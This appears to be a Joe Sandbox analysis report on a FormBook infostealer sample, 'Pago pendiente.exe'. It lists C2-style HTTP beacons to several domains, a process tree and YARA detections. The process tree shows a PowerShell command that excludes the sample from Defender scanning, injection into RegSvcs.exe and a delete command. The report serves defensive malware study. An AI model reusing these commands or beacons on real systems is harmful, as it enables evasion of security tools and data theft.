Data Raw: 0a 0a
Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49719 | 3.33.130.190 | 80 | 1028 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Apr 23, 2024 14:20:55.777256966 CEST | 156 | OUT | GET /gs12/?4h0=sKMZ9JWmyHzsFnuZp0fZtWbmtlVDzCM4ZbYLfRKv+HtPtGiIGUjdRyYwPYcfKf7QGcOF&vT=LtxxLba HTTP/1.1
Host: www.signomo.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Apr 23, 2024 14:20:55.902518988 CEST | 338 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Tue, 23 Apr 2024 12:20:55 GMT
Content-Type: text/html
Content-Length: 198
Connection: close
                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?4h0=sKMZ9JWmyHzsFnuZp0fZtWbmtlVDzCM4ZbYLfRKv+HtPtGiIGUjdRyYwPYcfKf7QGcOF&vT=LtxxLba"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49721 | 154.12.38.29 | 80 | 1028 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Apr 23, 2024 14:21:58.737889051 CEST | 154 | OUT | GET /gs12/?4h0=DR9+51q0CIrIDgcjStoZ4W0ewB14phJf97sbOZAiDLbqJph64OQ6FfPwpz0r/rXmCdIn&vT=LtxxLba HTTP/1.1
Host: www.airzf.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Apr 23, 2024 14:21:58.885886908 CEST | 481 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Tue, 23 Apr 2024 12:21:58 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
Location: https://www.airzf.com/gs12/?4h0=DR9+51q0CIrIDgcjStoZ4W0ewB14phJf97sbOZAiDLbqJph64OQ6FfPwpz0r/rXmCdIn&vT=LtxxLba
Strict-Transport-Security: max-age=31536000
                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
3 | 192.168.2.5 | 49724 | 3.33.130.190 | 80

Timestamp | Bytes transferred | Direction | Data
Apr 23, 2024 14:23:41.505845070 CEST | 161 | OUT | GET /gs12/?4h0=q59tBajeIo68CyAO1CDG6iJlXnRVkR/RpgQvK7vE3BQj9j+5I7CNTMK9jJbO36qf2KSo&vT=LtxxLba HTTP/1.1
Host: www.k2securityhn.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Apr 23, 2024 14:23:41.627742052 CEST | 338 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Tue, 23 Apr 2024 12:23:41 GMT
Content-Type: text/html
Content-Length: 198
Connection: close
                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?4h0=q59tBajeIo68CyAO1CDG6iJlXnRVkR/RpgQvK7vE3BQj9j+5I7CNTMK9jJbO36qf2KSo&vT=LtxxLba"}</script></head></html>


                                                        Target ID:0
                                                        Start time:14:19:54
                                                        Start date:23/04/2024
                                                        Path:C:\Users\user\Desktop\Pago pendiente.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\Pago pendiente.exe"
                                                        Imagebase:0xe40000
                                                        File size:624'640 bytes
                                                        MD5 hash:9A308E1EA62B7EDE8876E433178957D1
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2011441165.0000000004DCF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2011441165.0000000004DCF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2011441165.0000000004DCF000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2011441165.0000000004DCF000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2011441165.0000000004DCF000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2011441165.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2011441165.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2011441165.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2011441165.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2011441165.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:3
                                                        Start time:14:19:55
                                                        Start date:23/04/2024
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pago pendiente.exe"
                                                        Imagebase:0xea0000
                                                        File size:433'152 bytes
                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:4
                                                        Start time:14:19:55
                                                        Start date:23/04/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:5
                                                        Start time:14:19:55
                                                        Start date:23/04/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                        Imagebase:0x8c0000
                                                        File size:45'984 bytes
                                                        MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:6
                                                        Start time:14:19:56
                                                        Start date:23/04/2024
                                                        Path:C:\Windows\explorer.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\Explorer.EXE
                                                        Imagebase:0x7ff674740000
                                                        File size:5'141'208 bytes
                                                        MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000006.00000002.4458911697.000000000E4E6000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:7
                                                        Start time:14:19:59
                                                        Start date:23/04/2024
                                                        Path:C:\Windows\SysWOW64\control.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\SysWOW64\control.exe"
                                                        Imagebase:0x60000
                                                        File size:149'504 bytes
                                                        MD5 hash:EBC29AA32C57A54018089CFC9CACAFE8
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.4443703751.0000000002C20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4443703751.0000000002C20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4443703751.0000000002C20000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.4443703751.0000000002C20000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.4443703751.0000000002C20000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.4443748619.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4443748619.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4443748619.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.4443748619.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.4443748619.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:moderate
                                                        Has exited:false

                                                        Target ID:8
                                                        Start time:14:20:03
                                                        Start date:23/04/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                        Imagebase:0x790000
                                                        File size:236'544 bytes
                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:9
                                                        Start time:14:20:03
                                                        Start date:23/04/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true


                                                          Execution Graph

                                                          Execution Coverage:10.8%
                                                          Dynamic/Decrypted Code Coverage:99.1%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:330
                                                          Total number of Limit Nodes:8
                                                          [Execution graph: node/edge list omitted. API calls referenced by graph nodes: CreateWindowExW, GetModuleHandleW, LoadLibraryExW, CreateActCtxA, PostMessageW, DuplicateHandle, CallWindowProcW, CreateProcessA, VirtualAllocEx, WriteProcessMemory, Wow64SetThreadContext, ResumeThread, ReadProcessMemory]

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          [Control-flow graph for basic blocks 7724560-7724898 (memory dump 0x07720000, process 0); block/edge list omitted. Calls out of block 7724888 target 7726526, 7726436, 7725ee4, 77258e8, 77258d8 and 7725e6c]
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Teeq$Teeq$)"
                                                          • API String ID: 0-1356520842
                                                          • Opcode ID: 7cd46f6e012907abde5ab010c375d348fe7d695a29192f18a59667f0edcf9304
                                                          • Instruction ID: ebf7644fc9d0af94021043ab6c9f0436568c94a446ec9ca5e79f20ac60faf316
                                                          • Opcode Fuzzy Hash: 7cd46f6e012907abde5ab010c375d348fe7d695a29192f18a59667f0edcf9304
                                                          • Instruction Fuzzy Hash: 01B1AFB5E106998FCB04CFAAD8405DEFBB6FF89350F20802AD465AB215D7309D42CF94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1312 77245f8-772461b 1314 7724622-7724698 1312->1314 1315 772461d 1312->1315 1320 772469b 1314->1320 1315->1314 1321 77246a2-77246be 1320->1321 1322 77246c0 1321->1322 1323 77246c7-77246c8 1321->1323 1322->1320 1324 7724816-7724886 1322->1324 1325 77246e4-7724723 1322->1325 1326 77247fa-7724811 1322->1326 1327 7724728-772472c 1322->1327 1328 7724758-772476a 1322->1328 1329 77247d9-77247f5 1322->1329 1330 772479e-77247d4 1322->1330 1331 772476f-7724799 1322->1331 1332 77246cd-77246e2 1322->1332 1323->1324 1323->1332 1346 7724888 call 7726526 1324->1346 1347 7724888 call 7726436 1324->1347 1348 7724888 call 7725ee4 1324->1348 1349 7724888 call 77258e8 1324->1349 1350 7724888 call 77258d8 1324->1350 1351 7724888 call 7725e6c 1324->1351 1325->1321 1326->1321 1333 772472e-772473d 1327->1333 1334 772473f-7724746 1327->1334 1328->1321 1329->1321 1330->1321 1331->1321 1332->1321 1336 772474d-7724753 1333->1336 1334->1336 1336->1321 1345 772488e-7724898 1346->1345 1347->1345 1348->1345 1349->1345 1350->1345 1351->1345
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Teeq$Teeq$)"
                                                          • API String ID: 0-1356520842
                                                          • Opcode ID: 3eb517b6f5b04f5edaadd09e81b416579a44791f2fa1be9faaacab3e199a5796
                                                          • Instruction ID: 72c811d0ab9c78a98467e5a2571360004e631099f762363f73f32264c28b7a06
                                                          • Opcode Fuzzy Hash: 3eb517b6f5b04f5edaadd09e81b416579a44791f2fa1be9faaacab3e199a5796
                                                          • Instruction Fuzzy Hash: 1081E3B4E106598FCB08CFAAC984AEEFBB2FF89300F24902AD515AB354D7345906CF54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: tIh
                                                          • API String ID: 0-443931868
                                                          • Opcode ID: 98463883a82560923b9569f130ce7f508f667b6eef9169959a9be050a1d6756e
                                                          • Instruction ID: 8b4bf46f335bc6eb1d5e602d9d9ff8949550777c03439740f8004e1b76d75a61
                                                          • Opcode Fuzzy Hash: 98463883a82560923b9569f130ce7f508f667b6eef9169959a9be050a1d6756e
                                                          • Instruction Fuzzy Hash: EB025AB1914226CFCB04DFA5E4848AEFBB6FB45390F14856BD421EB612CB349983DF94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: tIh
                                                          • API String ID: 0-443931868
                                                          • Opcode ID: a2dcdde2e4d02ae9417504fa49872ffac7c5eb55ad2130c89fbfa6162c38179b
                                                          • Instruction ID: b46c7f09edd7109a50560591f16f9a748b6b59f53d043f7a98aeed5a7ebaac60
                                                          • Opcode Fuzzy Hash: a2dcdde2e4d02ae9417504fa49872ffac7c5eb55ad2130c89fbfa6162c38179b
                                                          • Instruction Fuzzy Hash: 5FE15AB0D14216CFCB04DF95D4808AEFBB2FF89380B10D56AD422EB615DB34AA42DF94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: tIh
                                                          • API String ID: 0-443931868
                                                          • Opcode ID: 4008d94df9e03abc82eebb962298d7ab43b03fd626e6dd741837be65e3449692
                                                          • Instruction ID: 56d8178d578e96fe18b37f132d25a0dc96449f0a49df95407e36f35ba89122d7
                                                          • Opcode Fuzzy Hash: 4008d94df9e03abc82eebb962298d7ab43b03fd626e6dd741837be65e3449692
                                                          • Instruction Fuzzy Hash: 5FD138B0D1521ADFCB04DF99C5848AEFBB2FF89340F10D56AD421AB215DB34AA42DF94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2021048352.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7a50000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a432508f3432161d182f7aff88fb53c590656d9dabb6d9e681d51984c1fb0be1
                                                          • Instruction ID: 7e30d05f231b8eaaf6e4d5702637bbfb37221f6f68f6eaee46dbb1b05e2c9717
                                                          • Opcode Fuzzy Hash: a432508f3432161d182f7aff88fb53c590656d9dabb6d9e681d51984c1fb0be1
                                                          • Instruction Fuzzy Hash: 5D32BBF4B016058FDB15DB69C550BAEBBF6AF88302F204469E916DB7A0CB35ED01CB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e11faabf25279f8a06d9a9385b95c283fc60d1431e46dd60c1a09656c19960d2
                                                          • Instruction ID: 9d26b86af983dbfca5bda0cc06527a8bd41ea0e279f2f7b2b55e28a5da6d6130
                                                          • Opcode Fuzzy Hash: e11faabf25279f8a06d9a9385b95c283fc60d1431e46dd60c1a09656c19960d2
                                                          • Instruction Fuzzy Hash: 9F915DB0D15218DFCB48CF99D5809ADFBB6FF8A350F24A419E126BB224D730A946DF14
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8dfaaaa0a60b7b54cd79956d8af3119daa53b8e0439e3527577adea0f8486331
                                                          • Instruction ID: 50155aa0099a996ff7678cdb5ab08b57c0dd1d774ca1dbc83accdf94980c2d7b
                                                          • Opcode Fuzzy Hash: 8dfaaaa0a60b7b54cd79956d8af3119daa53b8e0439e3527577adea0f8486331
                                                          • Instruction Fuzzy Hash: EF916DB0D15219DFCB48CFA9D5809ADFBB6FF8A350F24A426E125B7224D734A902CF14
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3aeeae9c052f3045e53b0218eaadaa85c31bfaf2d05bebeb2c3b56cf3868934e
                                                          • Instruction ID: 4c719cf4e025f57f77cb10b23d604966c1c24038650ece89fb050e0fc815e37e
                                                          • Opcode Fuzzy Hash: 3aeeae9c052f3045e53b0218eaadaa85c31bfaf2d05bebeb2c3b56cf3868934e
                                                          • Instruction Fuzzy Hash: 308124B4E14229DFCB04CFAAC8409EEFBB1FB89340F14985AD925B7254D738A952CF54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6adf22388ea5a1021c37e6b5c0794d87bf75ed6c715c4f3b1641c1e05cf4fa94
                                                          • Instruction ID: eb64dcedc6c2cae228e4c5f6b22798c220076fe5afb71d51b1db3518b40e6ed4
                                                          • Opcode Fuzzy Hash: 6adf22388ea5a1021c37e6b5c0794d87bf75ed6c715c4f3b1641c1e05cf4fa94
                                                          • Instruction Fuzzy Hash: 218121B4E10229CFCB04CFAAC8809EEFBB1FB89340F14955AD925B7254D734A952CF64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2021048352.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7a50000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 08a24afe5fb2c644d99543e8352666d2b4ef9a753e698379cdb7b800e44d0501
                                                          • Instruction ID: c16fc6c45e9809a79527ec1b58353736bb26c2515e480245b5f34675fa066ffb
                                                          • Opcode Fuzzy Hash: 08a24afe5fb2c644d99543e8352666d2b4ef9a753e698379cdb7b800e44d0501
                                                          • Instruction Fuzzy Hash: 5A2128B1D146188BEB18CF97C9453EEBFB6BFC9300F04C06AD818B62A5DB7409458F50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 093366c138605c319b6b48f6e9124b41725b112bad2967ba5a18267e115d356a
                                                          • Instruction ID: 4cc830e7ac552545ad569fb2bf08ec128583e29a4d210fcdcc6d84d38252364a
                                                          • Opcode Fuzzy Hash: 093366c138605c319b6b48f6e9124b41725b112bad2967ba5a18267e115d356a
                                                          • Instruction Fuzzy Hash: E221E9B1E016188BDB18CF9BD8452DEFBF7AFC9310F14C17AD418A6258DB741A568E90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3e7ffbab997a5cfc233e0e34093723da65d6ae2094e40b876273a1ebc4094a78
                                                          • Instruction ID: 1a14f45286c1c347711ea59660b75f71ec6f92b3711481917a75b564b6302007
                                                          • Opcode Fuzzy Hash: 3e7ffbab997a5cfc233e0e34093723da65d6ae2094e40b876273a1ebc4094a78
                                                          • Instruction Fuzzy Hash: C52121B1E016598BDB18CFABC9452DEBBF3AFC9310F14C07AD408AA258DB744946CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2021048352.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7a50000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 58ef445a4f85c82be1f7959884dac81c15e8eb2efbd8f5775fbeef55312de053
                                                          • Instruction ID: fc83550a6ac868d8330583a50a4a042cf14e2f90bb96d06e90f6c6bb443d52b1
                                                          • Opcode Fuzzy Hash: 58ef445a4f85c82be1f7959884dac81c15e8eb2efbd8f5775fbeef55312de053
                                                          • Instruction Fuzzy Hash: 7221C3B0D146188BEB18CF9BD9457EEFAF6BFC9300F04C06AE819762A4DB7409458F90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 305 7721e46-7721e4e 306 7721e55-7721e62 305->306 307 7721e4f-7721e53 305->307 308 7721e64 306->308 307->308 310 7721e69-7721e73 308->310 311 7721e7e-7721e92 call 77230d8 310->311 312 7721e98 311->312 313 7721e9b-7721ea5 312->313 314 7722185-772219d 313->314 315 7721eab-7721eb7 313->315 316 7721dcd-7721dd0 315->316 318 7721de2-7721de6 316->318 319 7721dd2 316->319 330 7721de8-7721df1 318->330 331 7721e09 318->331 319->313 319->318 320 7722092-7722097 319->320 321 7722162-7722176 319->321 322 7721f60-7721f64 319->322 323 7722114-772213e 319->323 324 772204b-7722053 319->324 325 7722058-772206b 319->325 326 7722179-7722182 319->326 327 7721faf-7721fc2 319->327 328 772209c-77220b2 319->328 329 7721ebc-7721ec0 319->329 320->316 332 7721f66-7721f6f 322->332 333 7721f87 322->333 393 7722140 323->393 394 772214a-7722154 323->394 324->316 354 772208b-7722090 325->354 355 772206d-7722074 325->355 327->314 358 7721fc8-7721fd0 327->358 359 77220b4-77220c6 328->359 360 77220c8 328->360 335 7721ec2-7721ecb 329->335 336 7721ee3 329->336 337 7721df3-7721df6 330->337 338 7721df8-7721e05 330->338 334 7721e0c-7721e0e 331->334 340 7721f71-7721f74 332->340 341 7721f76-7721f83 332->341 346 7721f8a-7721faa 333->346 343 7721e10-7721e16 334->343 344 7721e26-7721e43 334->344 349 7721ed2-7721edf 335->349 350 7721ecd-7721ed0 335->350 345 7721ee6-7721eea 336->345 351 7721e07 337->351 338->351 353 7721f85 340->353 341->353 361 7721e1a-7721e24 343->361 362 7721e18 343->362 